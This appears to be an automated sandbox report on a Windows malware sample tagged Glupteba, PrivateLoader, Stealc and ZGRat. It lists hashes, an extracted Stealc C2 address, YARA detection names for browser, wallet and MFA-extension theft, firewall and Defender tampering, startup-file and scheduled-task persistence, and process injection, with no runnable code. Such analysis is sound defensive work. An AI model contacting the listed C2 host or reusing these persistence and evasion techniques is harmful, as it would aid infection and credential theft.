glupteba | 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d

Analysis

max time kernel
45s
max time network
155s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11-05-2024 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe
Size

2.7MB
MD5

d2f812118c89341715fbff0ba9530396
SHA1

8e9cfa2ebe51e9f71d55b161fb13aae13ee3744f
SHA256

716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d
SHA512

7a1884c5b2130db511f318103ece6ae1499c1e877e4dfc39d6c83b762febea258b5921fa72ae3b413ecfc752b571b2ce33f6fa1f680461d94fc3d2f1988d6c77
SSDEEP

24576:tRoBHi3buy4toE1jC6Ayo2xhWLbSPlqRvc68XzRVGvQB5VA0UC1dUUKj/LZ8j3gy:boKmo4jC6Tov2RUC1doj/wgy

Score

10^/10

glupteba privateloader stealc zgrat dropper evasion execution loader rat stealer

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2828-567-0x0000000000AD0000-0x0000000004304000-memory.dmp	family_zgrat_v1
behavioral1/memory/2828-591-0x000000001EFB0000-0x000000001F0BA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2828-596-0x0000000005BC0000-0x0000000005BE4000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

jzI2PCckhM2dr6HoAqLMgUhQ.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	jzI2PCckhM2dr6HoAqLMgUhQ.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Detect binaries embedding considerable number of MFA browser extension IDs. 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2372-410-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral1/memory/2372-469-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral1/memory/2372-487-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
behavioral1/memory/2372-522-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2372-410-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral1/memory/2372-469-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral1/memory/2372-487-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
behavioral1/memory/2372-522-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs

Detects Windows executables referencing non-Windows User-Agents 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2372-410-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/2372-469-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/2372-487-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/2372-522-0x0000000000400000-0x000000000257A000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects encrypted or obfuscated .NET executables 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2828-567-0x0000000000AD0000-0x0000000004304000-memory.dmp	INDICATOR_EXE_DotNET_Encrypted

Detects executables (downlaoders) containing URLs to raw contents of a paste 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2908-5-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2908-3-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
behavioral1/memory/2908-1-0x0000000000400000-0x0000000000408000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawPaste_URL

Detects executables Discord URL observed in first stage droppers 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_DiscordURL

Detects executables built or packed with MPress PE compressor 3 IoCs

Processes:

resource	yara_rule
\Users\Admin\Pictures\jzI2PCckhM2dr6HoAqLMgUhQ.exe	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1704-180-0x0000000140000000-0x00000001403BD000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1704-303-0x0000000140000000-0x00000001403BD000-memory.dmp	INDICATOR_EXE_Packed_MPress

Detects executables containing URLs to raw contents of a Github gist 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

Detects executables containing artifacts associated with disabling Widnows Defender 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_DisableWinDefender

Detects executables referencing many varying, potentially fake Windows User-Agents 13 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-364-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-365-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2804-366-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/1592-379-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2804-388-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/1644-389-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/1592-392-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-409-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-486-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2992-485-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-468-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-521-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA
behavioral1/memory/2180-542-0x0000000000400000-0x000000000295D000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_TooManyWindowsUA

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid	process
1148	powershell.exe
1632	powershell.exe
2412	powershell.exe
2596	powershell.exe
1572	powershell.exe
1108	powershell.exe
1672	powershell.exe
2092	powershell.exe
2240	powershell.exe
2000	powershell.exe
776	powershell.exe
2244	powershell.EXE

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

2880 netsh.exe
1524 netsh.exe
2536 netsh.exe
1940 netsh.exe
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

pid	process
2880	netsh.exe
1524	netsh.exe
2536	netsh.exe
1940	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 8 IoCs

Processes:

CasPol.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BHHxxEE8HGWEmtEYAFumLe58.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z5zhajDHfuQZVHO1QEjM1vVa.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86HHwlU9ZuUd8pYImsr11OCB.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N2P6QbXciLI0HZPBsGGmLcTf.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hWHNSY2ug4TxpttYOEHdpe0G.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l6m452AmjDQ1Ljpc2E8Nfr4E.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6UNyfrhOS1Vr85UkR8bJlB41.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2CjwvqW71hIncypYQytKO34c.bat	CasPol.exe

Executes dropped EXE 9 IoCs

Processes:

3hHFjxEGwtHeOycK1vi8FR8E.exejzI2PCckhM2dr6HoAqLMgUhQ.exeUplzBhiVxHl5tGYUAFx2wpip.exeZrDm2chC20nLcS3ajgbRs7t9.exe5Tkrcmuc8ElvVtPywoDW5yx0.exeHi9AsPsI9BxRRQGmEu8tGHJP.exeVsr8rz5tpQExtRR8Faczs6RV.exeu21c.0.exeInstall.exe

pid	process
2640	3hHFjxEGwtHeOycK1vi8FR8E.exe
1704	jzI2PCckhM2dr6HoAqLMgUhQ.exe
1644	UplzBhiVxHl5tGYUAFx2wpip.exe
2180	ZrDm2chC20nLcS3ajgbRs7t9.exe
2804	5Tkrcmuc8ElvVtPywoDW5yx0.exe
1592	Hi9AsPsI9BxRRQGmEu8tGHJP.exe
2400	Vsr8rz5tpQExtRR8Faczs6RV.exe
2372	u21c.0.exe
2612	Install.exe

Loads dropped DLL 22 IoCs

Processes:

CasPol.exeVsr8rz5tpQExtRR8Faczs6RV.exe3hHFjxEGwtHeOycK1vi8FR8E.exeInstall.exe

pid	process
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2908	CasPol.exe
2400	Vsr8rz5tpQExtRR8Faczs6RV.exe
2400	Vsr8rz5tpQExtRR8Faczs6RV.exe
2400	Vsr8rz5tpQExtRR8Faczs6RV.exe
2640	3hHFjxEGwtHeOycK1vi8FR8E.exe
2640	3hHFjxEGwtHeOycK1vi8FR8E.exe
2640	3hHFjxEGwtHeOycK1vi8FR8E.exe
2640	3hHFjxEGwtHeOycK1vi8FR8E.exe
2400	Vsr8rz5tpQExtRR8Faczs6RV.exe
2612	Install.exe
2612	Install.exe
2612	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 pastebin.com
7 pastebin.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

51 ipinfo.io
46 api.myip.com
47 api.myip.com

flow	ioc
4	pastebin.com
7	pastebin.com

flow	ioc
51	ipinfo.io
46	api.myip.com
47	api.myip.com

Drops file in System32 directory 6 IoCs

Processes:

jzI2PCckhM2dr6HoAqLMgUhQ.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	jzI2PCckhM2dr6HoAqLMgUhQ.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	jzI2PCckhM2dr6HoAqLMgUhQ.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	jzI2PCckhM2dr6HoAqLMgUhQ.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	jzI2PCckhM2dr6HoAqLMgUhQ.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe

description pid process target process

PID 2648 set thread context of 2908 2648 2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1712 schtasks.exe
1688 schtasks.exe
2308 schtasks.exe
708 schtasks.exe
3036 schtasks.exe
1380 schtasks.exe
1288 schtasks.exe

description	pid	process	target process
PID 2648 set thread context of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe

pid	process
1712	schtasks.exe
1688	schtasks.exe
2308	schtasks.exe
708	schtasks.exe
3036	schtasks.exe
1380	schtasks.exe
1288	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

CasPol.exe

description pid process

Token: SeDebugPrivilege 2908 CasPol.exe

description	pid	process
Token: SeDebugPrivilege	2908	CasPol.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exeCasPol.exe3hHFjxEGwtHeOycK1vi8FR8E.exeVsr8rz5tpQExtRR8Faczs6RV.exeInstall.execmd.exe

description	pid	process	target process
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2648 wrote to memory of 2908	2648	2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe	CasPol.exe
PID 2908 wrote to memory of 2640	2908	CasPol.exe	3hHFjxEGwtHeOycK1vi8FR8E.exe
PID 2908 wrote to memory of 2640	2908	CasPol.exe	3hHFjxEGwtHeOycK1vi8FR8E.exe
PID 2908 wrote to memory of 2640	2908	CasPol.exe	3hHFjxEGwtHeOycK1vi8FR8E.exe
PID 2908 wrote to memory of 2640	2908	CasPol.exe	3hHFjxEGwtHeOycK1vi8FR8E.exe
PID 2908 wrote to memory of 1704	2908	CasPol.exe	jzI2PCckhM2dr6HoAqLMgUhQ.exe
PID 2908 wrote to memory of 1704	2908	CasPol.exe	jzI2PCckhM2dr6HoAqLMgUhQ.exe
PID 2908 wrote to memory of 1704	2908	CasPol.exe	jzI2PCckhM2dr6HoAqLMgUhQ.exe
PID 2908 wrote to memory of 1704	2908	CasPol.exe	jzI2PCckhM2dr6HoAqLMgUhQ.exe
PID 2908 wrote to memory of 1644	2908	CasPol.exe	UplzBhiVxHl5tGYUAFx2wpip.exe
PID 2908 wrote to memory of 1644	2908	CasPol.exe	UplzBhiVxHl5tGYUAFx2wpip.exe
PID 2908 wrote to memory of 1644	2908	CasPol.exe	UplzBhiVxHl5tGYUAFx2wpip.exe
PID 2908 wrote to memory of 1644	2908	CasPol.exe	UplzBhiVxHl5tGYUAFx2wpip.exe
PID 2908 wrote to memory of 2180	2908	CasPol.exe	ZrDm2chC20nLcS3ajgbRs7t9.exe
PID 2908 wrote to memory of 2180	2908	CasPol.exe	ZrDm2chC20nLcS3ajgbRs7t9.exe
PID 2908 wrote to memory of 2180	2908	CasPol.exe	ZrDm2chC20nLcS3ajgbRs7t9.exe
PID 2908 wrote to memory of 2180	2908	CasPol.exe	ZrDm2chC20nLcS3ajgbRs7t9.exe
PID 2908 wrote to memory of 2804	2908	CasPol.exe	5Tkrcmuc8ElvVtPywoDW5yx0.exe
PID 2908 wrote to memory of 2804	2908	CasPol.exe	5Tkrcmuc8ElvVtPywoDW5yx0.exe
PID 2908 wrote to memory of 2804	2908	CasPol.exe	5Tkrcmuc8ElvVtPywoDW5yx0.exe
PID 2908 wrote to memory of 2804	2908	CasPol.exe	5Tkrcmuc8ElvVtPywoDW5yx0.exe
PID 2908 wrote to memory of 1592	2908	CasPol.exe	Hi9AsPsI9BxRRQGmEu8tGHJP.exe
PID 2908 wrote to memory of 1592	2908	CasPol.exe	Hi9AsPsI9BxRRQGmEu8tGHJP.exe
PID 2908 wrote to memory of 1592	2908	CasPol.exe	Hi9AsPsI9BxRRQGmEu8tGHJP.exe
PID 2908 wrote to memory of 1592	2908	CasPol.exe	Hi9AsPsI9BxRRQGmEu8tGHJP.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2908 wrote to memory of 2400	2908	CasPol.exe	Vsr8rz5tpQExtRR8Faczs6RV.exe
PID 2640 wrote to memory of 2372	2640	3hHFjxEGwtHeOycK1vi8FR8E.exe	u21c.0.exe
PID 2640 wrote to memory of 2372	2640	3hHFjxEGwtHeOycK1vi8FR8E.exe	u21c.0.exe
PID 2640 wrote to memory of 2372	2640	3hHFjxEGwtHeOycK1vi8FR8E.exe	u21c.0.exe
PID 2640 wrote to memory of 2372	2640	3hHFjxEGwtHeOycK1vi8FR8E.exe	u21c.0.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2400 wrote to memory of 2612	2400	Vsr8rz5tpQExtRR8Faczs6RV.exe	Install.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
